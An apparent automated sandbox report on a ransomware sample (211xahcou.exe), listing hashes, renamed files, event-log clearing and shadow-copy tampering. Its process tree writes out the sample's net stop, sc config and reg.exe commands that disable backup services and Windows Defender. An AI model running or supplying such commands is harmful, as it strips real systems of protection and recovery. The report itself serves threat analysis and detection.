Overview
overview
10Static
static
8211xahcou.exe
windows7-x64
10211xahcou.exe
windows10-2004-x64
10hive.exe
windows7-x64
10hive.exe
windows10-2004-x64
10sjl8j6ap3.exe
windows7-x64
1sjl8j6ap3.exe
windows10-2004-x64
1windows_25...c5.exe
windows7-x64
10windows_25...c5.exe
windows10-2004-x64
10zi1ysv64h.exe
windows7-x64
10zi1ysv64h.exe
windows10-2004-x64
10Resubmissions
23-12-2022 20:19
221223-y39gvahb28 1023-12-2022 19:54
221223-ymz88scc8w 1023-12-2022 19:42
221223-yerbcsha78 10Analysis
-
max time kernel
134s -
max time network
47s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
23-12-2022 19:42
Behavioral task
behavioral1
Sample
211xahcou.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
211xahcou.exe
Resource
win10v2004-20220901-en
Behavioral task
behavioral3
Sample
hive.exe
Resource
win7-20221111-en
Behavioral task
behavioral4
Sample
hive.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral5
Sample
sjl8j6ap3.exe
Resource
win7-20220812-en
Behavioral task
behavioral6
Sample
sjl8j6ap3.exe
Resource
win10v2004-20221111-en
Behavioral task
behavioral7
Sample
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Resource
win7-20221111-en
Behavioral task
behavioral8
Sample
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral9
Sample
zi1ysv64h.exe
Resource
win7-20221111-en
General
-
Target
211xahcou.exe
-
Size
3.9MB
-
MD5
0e4d44dde522c07d09d9e3086cfae803
-
SHA1
d8dc26e2094869a0da78ecb47494c931419302dc
-
SHA256
33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277
-
SHA512
ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06
-
SSDEEP
49152:e2NiZPNNirb/T2vO90dL3BmAFd4A64nsfJk0NuXCdmTQb0/6VCrrPrsbg11VgWA2:e2ANB04yIa0hsirubO
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 1160 MpCmdRun.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 1648 wevtutil.exe 1652 wevtutil.exe 1480 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1792 bcdedit.exe 1604 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02071_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGCINFO.XML.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15019_.GIF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\San_Luis.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STP.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR20F.GIF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01143_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SCHOL_02.MID.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Slipstream.eftx.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\js\settings.js 211xahcou.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_buttongraphic.png 211xahcou.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-snaptracer.jar.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\DVD Maker\directshowtap.ax 211xahcou.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00636_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0199307.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\GostTitle.XSL.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationLeft_ButtonGraphic.png 211xahcou.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\settings.js 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY00642_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\bandwidth.png 211xahcou.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterRegular.ttf.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\css\RSSFeeds.css 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsPreviewTemplate.html.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSCOL11.INF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_dot.png 211xahcou.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_rest.png 211xahcou.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground_PAL.wmv 211xahcou.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_ButtonGraphic.png 211xahcou.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square.png 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00918_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\css\picturePuzzle.css 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00090_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME50.CSS.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\css\currency.css 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0103850.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00768_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR44F.GIF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\TAB_OFF.GIF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_ja.jar.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\de-DE\Mahjong.exe.mui.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-ui.xml.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_zh_CN.jar.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Monaco.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\gadget.xml 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD20013_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0305493.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_spellcheck.gif.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIDBAR98.POC.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\oskpredbase.xml 211xahcou.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Tucuman.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\handsafe.reg 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239063.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Common Files\System\msadc\en-US\msadcfr.dll.mui 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00957_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152556.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\gadget.xml 211xahcou.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0183290.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipsdan.xml 211xahcou.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyrun.jar.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj 211xahcou.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1716 sc.exe 1432 sc.exe 1940 sc.exe 1992 sc.exe 1420 sc.exe 880 sc.exe 1528 sc.exe 1956 sc.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 756 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1812 powershell.exe 1768 powershell.exe 896 211xahcou.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 1648 wevtutil.exe Token: SeBackupPrivilege 1648 wevtutil.exe Token: SeSecurityPrivilege 1652 wevtutil.exe Token: SeBackupPrivilege 1652 wevtutil.exe Token: SeSecurityPrivilege 1480 wevtutil.exe Token: SeBackupPrivilege 1480 wevtutil.exe Token: SeIncreaseQuotaPrivilege 944 wmic.exe Token: SeSecurityPrivilege 944 wmic.exe Token: SeTakeOwnershipPrivilege 944 wmic.exe Token: SeLoadDriverPrivilege 944 wmic.exe Token: SeSystemProfilePrivilege 944 wmic.exe Token: SeSystemtimePrivilege 944 wmic.exe Token: SeProfSingleProcessPrivilege 944 wmic.exe Token: SeIncBasePriorityPrivilege 944 wmic.exe Token: SeCreatePagefilePrivilege 944 wmic.exe Token: SeBackupPrivilege 944 wmic.exe Token: SeRestorePrivilege 944 wmic.exe Token: SeShutdownPrivilege 944 wmic.exe Token: SeDebugPrivilege 944 wmic.exe Token: SeSystemEnvironmentPrivilege 944 wmic.exe Token: SeRemoteShutdownPrivilege 944 wmic.exe Token: SeUndockPrivilege 944 wmic.exe Token: SeManageVolumePrivilege 944 wmic.exe Token: 33 944 wmic.exe Token: 34 944 wmic.exe Token: 35 944 wmic.exe Token: SeIncreaseQuotaPrivilege 1968 wmic.exe Token: SeSecurityPrivilege 1968 wmic.exe Token: SeTakeOwnershipPrivilege 1968 wmic.exe Token: SeLoadDriverPrivilege 1968 wmic.exe Token: SeSystemProfilePrivilege 1968 wmic.exe Token: SeSystemtimePrivilege 1968 wmic.exe Token: SeProfSingleProcessPrivilege 1968 wmic.exe Token: SeIncBasePriorityPrivilege 1968 wmic.exe Token: SeCreatePagefilePrivilege 1968 wmic.exe Token: SeBackupPrivilege 1968 wmic.exe Token: SeRestorePrivilege 1968 wmic.exe Token: SeShutdownPrivilege 1968 wmic.exe Token: SeDebugPrivilege 1968 wmic.exe Token: SeSystemEnvironmentPrivilege 1968 wmic.exe Token: SeRemoteShutdownPrivilege 1968 wmic.exe Token: SeUndockPrivilege 1968 wmic.exe Token: SeManageVolumePrivilege 1968 wmic.exe Token: 33 1968 wmic.exe Token: 34 1968 wmic.exe Token: 35 1968 wmic.exe Token: SeIncreaseQuotaPrivilege 1968 wmic.exe Token: SeSecurityPrivilege 1968 wmic.exe Token: SeTakeOwnershipPrivilege 1968 wmic.exe Token: SeLoadDriverPrivilege 1968 wmic.exe Token: SeSystemProfilePrivilege 1968 wmic.exe Token: SeSystemtimePrivilege 1968 wmic.exe Token: SeProfSingleProcessPrivilege 1968 wmic.exe Token: SeIncBasePriorityPrivilege 1968 wmic.exe Token: SeCreatePagefilePrivilege 1968 wmic.exe Token: SeBackupPrivilege 1968 wmic.exe Token: SeRestorePrivilege 1968 wmic.exe Token: SeShutdownPrivilege 1968 wmic.exe Token: SeDebugPrivilege 1968 wmic.exe Token: SeSystemEnvironmentPrivilege 1968 wmic.exe Token: SeRemoteShutdownPrivilege 1968 wmic.exe Token: SeUndockPrivilege 1968 wmic.exe Token: SeManageVolumePrivilege 1968 wmic.exe Token: 33 1968 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 896 wrote to memory of 964 896 211xahcou.exe 26 PID 896 wrote to memory of 964 896 211xahcou.exe 26 PID 896 wrote to memory of 964 896 211xahcou.exe 26 PID 964 wrote to memory of 1480 964 net.exe 28 PID 964 wrote to memory of 1480 964 net.exe 28 PID 964 wrote to memory of 1480 964 net.exe 28 PID 896 wrote to memory of 840 896 211xahcou.exe 29 PID 896 wrote to memory of 840 896 211xahcou.exe 29 PID 896 wrote to memory of 840 896 211xahcou.exe 29 PID 840 wrote to memory of 1392 840 net.exe 31 PID 840 wrote to memory of 1392 840 net.exe 31 PID 840 wrote to memory of 1392 840 net.exe 31 PID 896 wrote to memory of 1152 896 211xahcou.exe 32 PID 896 wrote to memory of 1152 896 211xahcou.exe 32 PID 896 wrote to memory of 1152 896 211xahcou.exe 32 PID 1152 wrote to memory of 1188 1152 net.exe 34 PID 1152 wrote to memory of 1188 1152 net.exe 34 PID 1152 wrote to memory of 1188 1152 net.exe 34 PID 896 wrote to memory of 1816 896 211xahcou.exe 35 PID 896 wrote to memory of 1816 896 211xahcou.exe 35 PID 896 wrote to memory of 1816 896 211xahcou.exe 35 PID 1816 wrote to memory of 1768 1816 net.exe 37 PID 1816 wrote to memory of 1768 1816 net.exe 37 PID 1816 wrote to memory of 1768 1816 net.exe 37 PID 896 wrote to memory of 632 896 211xahcou.exe 38 PID 896 wrote to memory of 632 896 211xahcou.exe 38 PID 896 wrote to memory of 632 896 211xahcou.exe 38 PID 632 wrote to memory of 776 632 net.exe 40 PID 632 wrote to memory of 776 632 net.exe 40 PID 632 wrote to memory of 776 632 net.exe 40 PID 896 wrote to memory of 1692 896 211xahcou.exe 41 PID 896 wrote to memory of 1692 896 211xahcou.exe 41 PID 896 wrote to memory of 1692 896 211xahcou.exe 41 PID 1692 wrote to memory of 336 1692 net.exe 43 PID 1692 wrote to memory of 336 1692 net.exe 43 PID 1692 wrote to memory of 336 1692 net.exe 43 PID 896 wrote to memory of 1100 896 211xahcou.exe 44 PID 896 wrote to memory of 1100 896 211xahcou.exe 44 PID 896 wrote to memory of 1100 896 211xahcou.exe 44 PID 1100 wrote to memory of 1176 1100 net.exe 46 PID 1100 wrote to memory of 1176 1100 net.exe 46 PID 1100 wrote to memory of 1176 1100 net.exe 46 PID 896 wrote to memory of 1564 896 211xahcou.exe 47 PID 896 wrote to memory of 1564 896 211xahcou.exe 47 PID 896 wrote to memory of 1564 896 211xahcou.exe 47 PID 1564 wrote to memory of 1948 1564 net.exe 49 PID 1564 wrote to memory of 1948 1564 net.exe 49 PID 1564 wrote to memory of 1948 1564 net.exe 49 PID 896 wrote to memory of 1432 896 211xahcou.exe 50 PID 896 wrote to memory of 1432 896 211xahcou.exe 50 PID 896 wrote to memory of 1432 896 211xahcou.exe 50 PID 896 wrote to memory of 1940 896 211xahcou.exe 52 PID 896 wrote to memory of 1940 896 211xahcou.exe 52 PID 896 wrote to memory of 1940 896 211xahcou.exe 52 PID 896 wrote to memory of 1992 896 211xahcou.exe 54 PID 896 wrote to memory of 1992 896 211xahcou.exe 54 PID 896 wrote to memory of 1992 896 211xahcou.exe 54 PID 896 wrote to memory of 1420 896 211xahcou.exe 56 PID 896 wrote to memory of 1420 896 211xahcou.exe 56 PID 896 wrote to memory of 1420 896 211xahcou.exe 56 PID 896 wrote to memory of 880 896 211xahcou.exe 58 PID 896 wrote to memory of 880 896 211xahcou.exe 58 PID 896 wrote to memory of 880 896 211xahcou.exe 58 PID 896 wrote to memory of 1528 896 211xahcou.exe 60
Processes
-
C:\Users\Admin\AppData\Local\Temp\211xahcou.exe"C:\Users\Admin\AppData\Local\Temp\211xahcou.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:896 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:1480
-
-
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:840 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1392
-
-
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1188
-
-
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1768
-
-
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:776
-
-
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:336
-
-
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1176
-
-
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1948
-
-
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵
- Launches sc.exe
PID:1432
-
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:1940
-
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:1992
-
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:1420
-
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵
- Launches sc.exe
PID:880
-
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:1528
-
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:1956
-
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:1716
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1068
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:860
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1220
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:816
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1756
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1704
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1964
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1196
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:836
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
